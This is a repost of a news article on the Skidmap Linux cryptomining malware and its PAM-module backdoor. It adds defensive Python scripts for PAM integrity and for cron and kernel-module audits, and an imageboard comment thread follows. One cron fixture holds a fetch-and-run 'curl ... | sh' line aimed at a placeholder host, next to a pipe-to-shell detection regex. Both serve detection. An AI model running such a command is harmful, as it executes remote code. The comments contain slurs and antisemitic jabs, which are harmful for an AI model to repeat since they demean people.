New Linux malware mines crypto after installing backdoor with secret master password

>Skidmap uses fake statistics to hide its CPU usage

Cybersecurity researchers have identified a new strain of Linux malware that not only mines cryptocurrency illicitly, but provides the attackers with universal access to an infected system via a “secret master password.” TrendMicro’s latest blog also reveals that Skidmap attempts to mask its cryptocurrency mining by faking network traffic and CPU-related statistics. High CPU usage is considered the primary red flag of illicit cryptocurrency mining, which makes this functionality particularly dangerous.

Cryptocurrency mining malware is still a very real threat
Initial infection occurs in a Linux process called crontab, a standard process that periodically schedules timed jobs in Unix-like systems. Skidmap then installs multiple malicious binaries, the first minimizing the infected machine’s security settings so that it can begin mining cryptocurrency unhindered.

“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine,” wrote TrendMicro. “The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version […].”

“[T]his malicious pam_unix.so file accepts a specific password for any users, thus allowing the attackers to log in as any user in the machine,” added the firm.

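The pam_unix.so swap described above is a plain file replacement, so the defender's first check is file integrity against a trusted baseline. The following is an added example (not code from the article or from TrendMicro): it hashes the modules in a PAM directory and compares them with a baseline manifest. The directory, the module contents and the baseline digests are all constructed inside a temp directory so the script runs offline; on a real host the baseline would come from the package manager (`rpm -V pam`, `debsums`) or from a snapshot taken at build time.

```python
"""Verify PAM modules against a trusted baseline of SHA-256 digests.

Added example, not part of the TNW article or TrendMicro's write-up.
All files and digests below are constructed so the demo runs offline.
"""
import hashlib
import os
import tempfile


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_modules(module_dir: str, baseline: dict) -> dict:
    """Return {module_name: status}.

    status is 'ok', 'MODIFIED' (hash differs from baseline), 'MISSING'
    (baseline entry has no file) or 'UNEXPECTED' (.so on disk that the
    baseline never listed).
    """
    results = {}
    for name, expected in baseline.items():
        path = os.path.join(module_dir, name)
        if not os.path.exists(path):
            results[name] = "MISSING"
        elif sha256_of(path) != expected:
            results[name] = "MODIFIED"
        else:
            results[name] = "ok"
    for name in sorted(os.listdir(module_dir)):
        if name.endswith(".so") and name not in baseline:
            results[name] = "UNEXPECTED"
    return results


def demo() -> dict:
    """Build a fake security/ directory, record a baseline, then replace
    pam_unix.so in place (same name, different bytes) and re-verify."""
    tmp = tempfile.mkdtemp()
    # Constructed stand-ins for the real ELF shared objects
    genuine_unix = b"\x7fELF original pam_unix build (constructed bytes)"
    genuine_deny = b"\x7fELF pam_deny (constructed bytes)"
    with open(os.path.join(tmp, "pam_unix.so"), "wb") as f:
        f.write(genuine_unix)
    with open(os.path.join(tmp, "pam_deny.so"), "wb") as f:
        f.write(genuine_deny)

    # Baseline captured while the files are still trustworthy
    baseline = {
        "pam_unix.so": hashlib.sha256(genuine_unix).hexdigest(),
        "pam_deny.so": hashlib.sha256(genuine_deny).hexdigest(),
    }
    before = verify_modules(tmp, baseline)

    # Simulate the swap described in the article: the filename is unchanged
    # but the contents are not the distribution's module any more.
    with open(os.path.join(tmp, "pam_unix.so"), "wb") as f:
        f.write(b"\x7fELF replaced module (constructed bytes)")
    after = verify_modules(tmp, baseline)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, result in demo().items():
        print(phase, result)
```

One caveat that follows from the article itself: Skidmap also loads kernel-module rootkits, and a rootkit that controls the kernel can lie to a userland hash tool about what is on disk. A hash comparison like this one is reliable only when run from a clean environment (rescue media, or the disk mounted on a known-good host), not from inside the suspect system.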

Additional binaries are dropped into the system to monitor the cryptocurrency miners as they work to generate digital money for the attackers. Skidmap checks which Linux OS is running before installing its crypto-miner. Unfortunately, TrendMicro didn’t indicate which cryptocurrency Skidmap illicitly mines. Hard Fork has reached out to the researchers for more information and will update this piece should they reply. The firm warned that Skidmap is more difficult to cure compared to other malware, particularly as it uses Linux Kernel Module (LKM) rootkits, which overwrite or modify parts of the OS kernel.

Skidmap is also reportedly programmed to reinfect systems that have been cleaned or restored. “Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” wrote TrendMicro.

To protect against Skidmap, TrendMicro urges admins to keep their systems and servers patched and updated, and beware of unverified, third-party repositories. They should also enforce the “principle of least privilege” to prevent malicious binaries from obtaining access to critical system processes in the first place.

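Two of the places the article names, cron and loaded kernel modules, are cheap to audit. The script below is an added example (not from the article or TrendMicro) that runs two allowlist checks over constructed input: cron lines are flagged if they pipe a download straight into a shell (a generic pattern, assumed here for illustration, not something the article attributes to Skidmap), and kernel modules are flagged if they are not on a known list or carry out-of-tree/unsigned taint flags in the `/proc/modules` format. The sample crontab and `/proc/modules` text, the module names and the placeholder URL are all constructed; on a real host you would read `crontab -l` for each user, `/etc/crontab`, `/etc/cron.d/`, `/var/spool/cron/` and `/proc/modules` directly.

```python
"""Audit cron entries and loaded kernel modules against allowlists.

Added example, not part of the article. Inputs are constructed text in the
shape of `crontab -l` output and /proc/modules.
"""
import re

# Constructed crontab: two routine jobs and one that fetches a script and
# pipes it into a shell. The URL is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * /usr/local/bin/backup.sh
*/1 * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER.invalid/x.sh | sh
"""

# Constructed /proc/modules lines: name size refcount deps state address [taint]
# "(OE)" is the kernel's taint marker for an out-of-tree (O), unsigned (E) module.
SAMPLE_PROC_MODULES = """\
ext4 778240 2 - Live 0x0000000000000000
xfs 1486848 1 - Live 0x0000000000000000
example_lkm 16384 0 - Live 0x0000000000000000 (OE)
"""

# Hypothetical allowlist; a real one is generated from the build image.
KNOWN_MODULES = {"ext4", "xfs", "e1000", "virtio_net"}

# Download tool followed somewhere on the line by a pipe into sh/bash.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron_lines(text: str) -> list:
    """Return non-comment cron lines that pipe a download into a shell."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if PIPE_TO_SHELL.search(line):
            hits.append(line)
    return hits


def unknown_modules(text: str, known=KNOWN_MODULES) -> list:
    """Return (name, tainted) for modules off the allowlist or carrying taint flags."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        name = fields[0]
        # Taint flags, when present, are the trailing parenthesised field.
        tainted = fields[-1].startswith("(") and fields[-1].endswith(")")
        if name not in known or tainted:
            findings.append((name, tainted))
    return findings


def audit(crontab_text: str, modules_text: str) -> dict:
    """Run both checks and return a summary usable by a monitoring job."""
    return {
        "cron": suspicious_cron_lines(crontab_text),
        "modules": unknown_modules(modules_text),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_CRONTAB, SAMPLE_PROC_MODULES).items():
        print(key, value)
```

The module check has the same limitation as any userland inspection of a rootkitted host: a kernel module that hides itself will not appear in `/proc/modules` at all, so an empty finding list is evidence only when the kernel is trusted. The cron check is the more durable of the two, since the scheduler entry has to exist somewhere the kernel's own cron daemon can read it.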

Update 10:38 UTC, September 17: A TrendMicro spokesperson has since contacted Hard Fork to confirm that Skidmap mines Monero, the privacy-focused altcoin.

“The cryptocurrency miner pertaining to this article is a variant of XMRig which mines Monero cryptocurrency,” they said via email.

XMRig is open-source cryptocurrency mining software available on GitHub.

Source: thenextweb.com/hardfork/2019/09/16/cryptocurrency-mining-malware-linux-trend-micro-skidmap-backdoor/


And just what might be the entry point for this malware? If it's a download thing then who cares.

Lol, two people at my work were hit by this. I don't understand how.

>ipfs already used by malware
lmao

Fake and gay.

bullshit

blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/


Repeat after me:
No internet access, no malware.

this. who cares what it does if it doesn't have a way to get on your system other than you going fullretard.x86?

(((((trend micro))))))

Not doubting backdoors are real, doubting "installs via crontab"

zdnet.com/article/employees-connect-nuclear-plant-to-the-internet-so-they-can-mine-cryptocurrency/

>infected via cron
audit your system from the fundamentals brainlet rhel and sle fags.

Social engineering

>not compiling from source and auditing the code of every program you run
lmao

I don't understand Bitcoin so this might be wrong but can't you mine send and receive Bitcoin without an internet connection?

yeah the fucking bitcoin fairy comes and takes your hashes to crypto heaven

No, you need to create blocks that agree with the rest of the network. If you aren't connected then your chain will be out of sync and your work will be useless

The security researchers were British so it's pronounced "secret moster possword"

yeah right

What happens when you download infected compiler, faggot? Or you compile the compiler yourself?

Fuck off jew, everyone knows Linux can't get viruses.
MacFags BTFO'd once again

>not bootstrapping your compiler starting from assembly you manually wrote yourself
user...

>installation via crontab
What does this mean? It isn't news that processes in Linux are given the permissions of the user that runs them. "Linux doesn't get viruses" is a meme, and it doesn't mean "it is impossible for an executable to compromise/damage a Linux system" anyway.

lamo